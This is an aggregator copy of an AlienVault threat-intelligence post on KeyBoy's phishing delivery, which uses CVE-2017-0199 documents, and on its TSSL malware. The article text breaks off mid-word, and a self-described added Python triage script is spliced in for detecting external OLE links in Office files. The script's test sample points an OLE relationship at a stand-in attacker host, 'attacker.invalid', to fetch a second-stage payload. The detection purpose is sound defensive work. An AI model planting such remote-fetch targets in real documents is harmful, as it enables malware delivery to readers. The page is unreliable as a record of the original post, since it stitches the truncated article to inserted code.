One Article Review

Home - The article:
Source AlienVault.webp AlienVault Blog
Identifier 837210
Publication date 2018-10-08 17:09:00 (viewed: 2018-10-08 21:02:36)
Title Delivery (Key)Boy
Text Introduction. Below we've outlined the delivery phase of some recent attacks by KeyBoy, a group of attackers believed to operate out of China. They were first identified in 2013 targeting governments and NGOs in South East Asia. That primary targeting continues to this day, though they have also been known to go after more diverse victims such as the energy sector.

Malware Delivery through Open Source Exploit Kits. KeyBoy sent the following email to India's Ambassador to Ethiopia from an email address at nic[.]in, India's National Informatics Centre. The attached file (f43f60b62002d0700ccbcbd9334520b6) is a malicious document that downloads and executes a script, which in turn installs the final payload. This script contains text (e.g. “”) that matches a pre-packed version of the popular CVE-2017-0199 exploit available on GitHub. We've seen other malicious documents where KeyBoy have tested another exploit generator. In that case KeyBoy didn't change the generator's default settings, so the document metadata provides some obvious hints that the document is malicious.

Delivered Malware. The next stage in these attacks is typically a malware family known as TSSL. This malware was originally identified by PwC and has more recently been described by Trend Micro and CitizenLab. Most samples are built on the attacker's machine fr
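The two document-level indicators the post relies on (an Office document that reaches out to an external OLE target, the CVE-2017-0199 pattern, and generator-default metadata) can be checked statically without opening the file. The following triage script is an added example and is not code from the AlienVault post or from KeyBoy's tooling; it only uses standard OOXML namespaces and relationship types. The sample .docx package, its URL (`attacker.invalid`) and the author string `generator-default-user` are constructed here for the demonstration and are not taken from the real samples.

```python
"""Static triage of a .docx for the delivery pattern described above:
an oleObject relationship whose target is external (fetched at open time,
the CVE-2017-0199 technique) plus core metadata left by an exploit generator.

Added example, not from the AlienVault post. Sample document, URL and author
string are constructed for the demo.
"""
import io
import zipfile
import xml.etree.ElementTree as ET

# Standard OOXML namespaces and relationship type; nothing KeyBoy-specific.
REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"
CORE_NS = {
    "cp": "http://schemas.openxmlformats.org/package/2006/metadata/core-properties",
    "dc": "http://purl.org/dc/elements/1.1/",
}


def external_ole_targets(docx_bytes):
    """Return (rels part, target) for every oleObject relationship marked
    TargetMode="External". A benign embedded OLE object is an internal part
    of the package; an external target is fetched when the document opens."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in z.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(z.read(name))
            for rel in root.iter("{%s}Relationship" % REL_NS):
                if rel.get("Type") == OLE_REL and rel.get("TargetMode") == "External":
                    hits.append((name, rel.get("Target")))
    return hits


def core_metadata(docx_bytes):
    """Pull creator / lastModifiedBy from docProps/core.xml. Generators run
    with default settings leave telltale values here."""
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        if "docProps/core.xml" not in z.namelist():
            return {}
        root = ET.fromstring(z.read("docProps/core.xml"))
    meta = {}
    for key, xpath in (("creator", "dc:creator"), ("lastModifiedBy", "cp:lastModifiedBy")):
        el = root.find(xpath, CORE_NS)
        if el is not None and el.text:
            meta[key] = el.text.strip()
    return meta


def triage(docx_bytes):
    """Combine both checks into one verdict; external OLE alone is enough
    to flag, metadata is reported for the analyst."""
    targets = external_ole_targets(docx_bytes)
    return {
        "external_ole": targets,
        "metadata": core_metadata(docx_bytes),
        "suspicious": bool(targets),
    }


def build_sample_docx(external=True):
    """Constructed sample (not a real KeyBoy document). With external=True the
    single oleObject relationship points at a remote URL; with external=False
    it points at an internal embeddings part, as a legitimate document would."""
    if external:
        target = 'Target="http://attacker.invalid/stage2.rtf" TargetMode="External"'
    else:
        target = 'Target="embeddings/oleObject1.bin"'
    rels = f'''<?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="{REL_NS}">
  <Relationship Id="rId1" Type="{OLE_REL}" {target}/>
</Relationships>'''
    core = f'''<?xml version="1.0" encoding="UTF-8"?>
<cp:coreProperties xmlns:cp="{CORE_NS["cp"]}" xmlns:dc="{CORE_NS["dc"]}">
  <dc:creator>generator-default-user</dc:creator>
  <cp:lastModifiedBy>generator-default-user</cp:lastModifiedBy>
</cp:coreProperties>'''
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("word/_rels/document.xml.rels", rels)
        z.writestr("docProps/core.xml", core)
    return buf.getvalue()


if __name__ == "__main__":
    print(triage(build_sample_docx()))
    print(triage(build_sample_docx(external=False)))
```

Run it against a real sample by passing the file's bytes to `triage()`; the same relationship walk covers `.xlsx`/`.pptx` packages, since all of them keep their `.rels` parts in the same format. Note that the metadata check is only a hint, as the post says: an attacker who edits the generator defaults leaves nothing there, whereas the external OLE target is structural to the technique.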
Sent Yes
Tags
Stories APT 23
Notes


The article does not appear to have been picked up after its publication.


The article does not appear to have been picked up from an earlier one.